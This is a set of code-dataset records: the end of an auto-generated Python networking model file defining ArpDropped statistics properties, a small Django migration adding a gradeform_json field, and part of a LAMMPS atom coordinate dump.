prop.isOper = True
prop.isStats = True
meta.props.add("bytesMin", prop)
prop = PropMeta("str", "bytesPer", "bytesPer", 31335, PropCategory.IMPLICIT_PERIODIC)
prop.label = "ArpDropped Bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesPer", prop)
prop = PropMeta("str", "bytesRate", "bytesRate", 31343, PropCategory.IMPLICIT_RATE)
prop.label = "ArpDropped Bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRate", prop)
prop = PropMeta("str", "bytesRateAvg", "bytesRateAvg", 31356, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Bytes rate average value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateAvg", prop)
prop = PropMeta("str", "bytesRateLast", "bytesRateLast", 31353, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Bytes rate current value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateLast", prop)
prop = PropMeta("str", "bytesRateMax", "bytesRateMax", 31355, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Bytes rate maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateMax", prop)
prop = PropMeta("str", "bytesRateMin", "bytesRateMin", 31354, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Bytes rate minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateMin", prop)
prop = PropMeta("str", "bytesRateSpct", "bytesRateSpct", 31357, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Bytes rate suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateSpct", prop)
prop = PropMeta("str", "bytesRateThr", "bytesRateThr", 31359, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Bytes rate thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("bytesRateThr", prop)
prop = PropMeta("str", "bytesRateTr", "bytesRateTr", 31361, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Bytes rate trend"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTr", prop)
prop = PropMeta("str", "bytesRateTrBase", "bytesRateTrBase", 31360, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Bytes rate trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTrBase", prop)
prop = PropMeta("str", "bytesRateTtl", "bytesRateTtl", 31358, PropCategory.IMPLICIT_TOTAL)
prop.label = "ArpDropped Bytes rate total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesRateTtl", prop)
prop = PropMeta("str", "bytesSpct", "bytesSpct", 31339, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesSpct", prop)
prop = PropMeta("str", "bytesThr", "bytesThr", 31340, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("bytesThr", prop)
prop = PropMeta("str", "bytesTr", "bytesTr", 31342, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesTr", prop)
prop = PropMeta("str", "bytesTrBase", "bytesTrBase", 31341, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("bytesTrBase", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pktsAvg", "pktsAvg", 31374, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsAvg", prop)
prop = PropMeta("str", "pktsBase", "pktsBase", 31369, PropCategory.IMPLICIT_BASELINE)
prop.label = "ArpDropped Packets baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsBase", prop)
prop = PropMeta("str", "pktsCum", "pktsCum", 31370, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "ArpDropped Packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsCum", prop)
prop = PropMeta("str", "pktsLast", "pktsLast", 31368, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Packets current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsLast", prop)
prop = PropMeta("str", "pktsMax", "pktsMax", 31373, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsMax", prop)
prop = PropMeta("str", "pktsMin", "pktsMin", 31372, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsMin", prop)
prop = PropMeta("str", "pktsPer", "pktsPer", 31371, PropCategory.IMPLICIT_PERIODIC)
prop.label = "ArpDropped Packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsPer", prop)
prop = PropMeta("str", "pktsRate", "pktsRate", 31379, PropCategory.IMPLICIT_RATE)
prop.label = "ArpDropped Packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRate", prop)
prop = PropMeta("str", "pktsRateAvg", "pktsRateAvg", 31392, PropCategory.IMPLICIT_AVG)
prop.label = "ArpDropped Packets rate average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateAvg", prop)
prop = PropMeta("str", "pktsRateLast", "pktsRateLast", 31389, PropCategory.IMPLICIT_LASTREADING)
prop.label = "ArpDropped Packets rate current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateLast", prop)
prop = PropMeta("str", "pktsRateMax", "pktsRateMax", 31391, PropCategory.IMPLICIT_MAX)
prop.label = "ArpDropped Packets rate maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateMax", prop)
prop = PropMeta("str", "pktsRateMin", "pktsRateMin", 31390, PropCategory.IMPLICIT_MIN)
prop.label = "ArpDropped Packets rate minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateMin", prop)
prop = PropMeta("str", "pktsRateSpct", "pktsRateSpct", 31393, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Packets rate suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateSpct", prop)
prop = PropMeta("str", "pktsRateThr", "pktsRateThr", 31395, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Packets rate thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pktsRateThr", prop)
prop = PropMeta("str", "pktsRateTr", "pktsRateTr", 31397, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Packets rate trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTr", prop)
prop = PropMeta("str", "pktsRateTrBase", "pktsRateTrBase", 31396, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Packets rate trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTrBase", prop)
prop = PropMeta("str", "pktsRateTtl", "pktsRateTtl", 31394, PropCategory.IMPLICIT_TOTAL)
prop.label = "ArpDropped Packets rate total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsRateTtl", prop)
prop = PropMeta("str", "pktsSpct", "pktsSpct", 31375, PropCategory.IMPLICIT_SUSPECT)
prop.label = "ArpDropped Packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsSpct", prop)
prop = PropMeta("str", "pktsThr", "pktsThr", 31376, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "ArpDropped Packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pktsThr", prop)
prop = PropMeta("str", "pktsTr", "pktsTr", 31378, PropCategory.IMPLICIT_TREND)
prop.label = "ArpDropped Packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsTr", prop)
prop = PropMeta("str", "pktsTrBase", "pktsTrBase", 31377, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "ArpDropped Packets trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pktsTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("l1EthIfToEPg", "EPG", "cobra.model.fv.EPg"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
77bed12fb92ed9a4be75f7a3e3e79b0e4a1560f2 | 9ba2b89dbdeefa54c6b6935d772ce36be7b05292 | /devilry/devilry_group/migrations/0002_feedbackset_gradeform_json.py | 61b10f5028325b2b42f1b43c33e35c9c77ae6cf1 | [] | no_license | kristtuv/devilry-django | 0ffcd9d2005cad5e51f6377484a83d778d65050f | dd2a4e5a887b28268f3a45cc3b25a40c0e313fd3 | refs/heads/master | 2020-04-27T06:02:45.518765 | 2019-02-15T13:28:20 | 2019-02-15T13:28:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('devilry_group', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='feedbackset',
name='gradeform_json',
field=models.TextField(null=True, blank=True),
),
]
| [
"stianjul@gmail.com"
] | stianjul@gmail.com |
3ae711f77841ae1d7c0a636a8750ef11aeb7dd2f | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp223_9000.py | dba8a0ab5453dc43f268323efdbd4e331fe24c86 | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,732 | py | ITEM: TIMESTEP
9000
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
-1.7399323368011969e+02 2.2119323368016401e+02
-1.7399323368011969e+02 2.2119323368016401e+02
-1.7399323368011969e+02 2.2119323368016401e+02
ITEM: ATOMS id type xs ys zs
1879 1 0.460811 0.97243 0.0129587
1731 1 0.257982 0.0772842 0.0303815
640 1 0.345803 0.187254 0.0155385
535 1 0.300887 0.753809 0.0331833
1326 1 0.229303 0.381132 0.00397181
274 1 0.494065 0.355894 0.0273429
1787 1 0.0999422 0.630685 0.151452
137 1 0.147578 0.48977 0.00210796
983 1 0.424872 0.545005 0.0280916
744 1 0.0590379 0.807441 0.118354
1144 1 0.467476 0.421115 0.289152
1470 1 0.147492 0.0306706 0.464431
10 1 0.449234 0.663793 0.0400737
1902 1 0.0426606 0.979385 0.44723
592 1 0.0120205 0.354594 0.335644
1777 1 0.164457 0.947182 0.0854724
270 1 0.0605468 0.0514102 0.017359
1157 1 0.479288 0.139525 0.435463
1905 1 0.236518 0.0567451 0.0384331
1402 1 0.263481 0.116992 0.0241527
118 1 0.421104 0.120921 0.0589068
1792 1 0.146686 0.212045 0.0706084
1463 1 0.469182 0.532996 0.0116651
1390 1 0.37494 0.4079 0.0618037
326 1 0.0149861 0.530797 0.0682209
269 1 0.244427 0.52343 0.0471787
914 1 0.204302 0.457649 0.00550574
635 1 0.340515 0.528543 0.0463351
875 1 0.394629 0.244948 0.497266
477 1 0.149982 0.580428 0.00958573
1721 1 0.491135 0.152598 0.262286
467 1 0.194469 0.814765 0.0594622
1693 1 0.250099 0.921756 0.000269019
1643 1 0.0988496 0.886589 0.0136597
1933 1 0.16628 0.911072 0.0243858
1705 1 0.0785943 0.0961029 0.101791
1794 1 0.169166 0.162394 0.0777625
750 1 0.128688 0.251878 0.0186481
723 1 0.294541 0.432689 0.143881
1113 1 0.497737 0.352287 0.468753
761 1 0.00464433 0.738226 0.0644859
85 1 0.278353 0.522748 0.0968971
531 1 0.0333067 0.648764 0.104187
1991 1 0.497359 0.0720484 0.0718208
1166 1 0.17379 0.912859 0.00821741
281 1 0.327267 0.909881 0.0374856
846 1 0.433939 0.0441195 0.115
547 1 0.401691 0.0552682 0.061341
111 1 0.42599 0.113826 0.028104
1653 1 0.101195 0.12562 0.0430911
1336 1 0.271513 0.206497 0.0722432
1769 1 0.254235 0.195574 0.0507211
455 1 0.111628 0.485065 0.079565
609 1 0.417426 0.482783 0.0613399
593 1 0.473262 0.504489 0.0810626
53 1 0.120108 0.569959 0.0895392
751 1 0.402967 0.60804 0.109381
1235 1 0.220409 0.604315 0.0396395
556 1 0.136246 0.637512 0.135935
504 1 0.408592 0.699565 0.140156
247 1 0.303876 0.637615 0.0720888
1192 1 0.154298 0.778986 0.113237
927 1 0.204893 0.755049 0.0543257
843 1 0.426585 0.724908 0.0286864
412 1 0.0272361 0.830143 0.0435978
1130 1 0.0837254 0.886542 0.0533688
329 1 0.127266 0.895871 0.0915247
363 1 0.196009 0.998386 0.0651115
1410 1 0.354087 0.96774 0.0631596
